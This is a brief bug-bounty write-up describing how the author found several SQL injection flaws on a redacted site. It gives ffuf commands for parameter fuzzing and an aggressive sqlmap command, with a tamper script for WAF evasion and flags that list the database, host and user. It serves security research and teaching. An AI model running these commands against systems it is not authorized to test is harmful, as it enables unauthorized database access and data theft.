How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

Enumeration Phase:

uro is a tool used to delete duplicate urls

Getting Parameters:

ffuf -w lowercase-parameters.txt -u "https://redacted.org/searchProgressCommitment.php?FUZZ=5"
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u "https://redacted.org/searchProgressCommitment.php"

Exploitation:

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast
--level 5 --> Level of tests to perform.
--risk 3 --> Risk of tests to perform
--dbms --> back-end DBMS value
--no-cast --> to avoid use cast-alike statements during data fetching
--tamper --> to evade filters and WAF’s
"--hostname --current-user --current-db --dbs" --> to retrieve info about the database
#1st SQLI
#2nd SQLI
#3rd SQLI
#4th SQLI

--

--

--

Cyber Security Researcher | Bug Hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How I Am Learning Programming

Refactor — You Keep Using That Word…

Make Google Search in 2020/21 — Angular 10

How to implement a value-object in C#

Work Agile Like A Boss

Webinar: Work Agile Like A Boss

Tutorial Fuzzy Logic Mamdani for Arduino

Tutorial Fuzzy Logic Mamdani for Arduino

Submit the HTML form data in Google Sheet

Submit the HTML form data in Google Sheet

Setting up your company to release apps on the Google Play Store

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mahmoud Youssef

Mahmoud Youssef

Cyber Security Researcher | Bug Hunter

More from Medium

Hacked Google-Meet…??!

Finding CSRF Vulnerabilities with BurpSuite

HOW I hacked thousand of subdomains

OTP Bypass {step to step}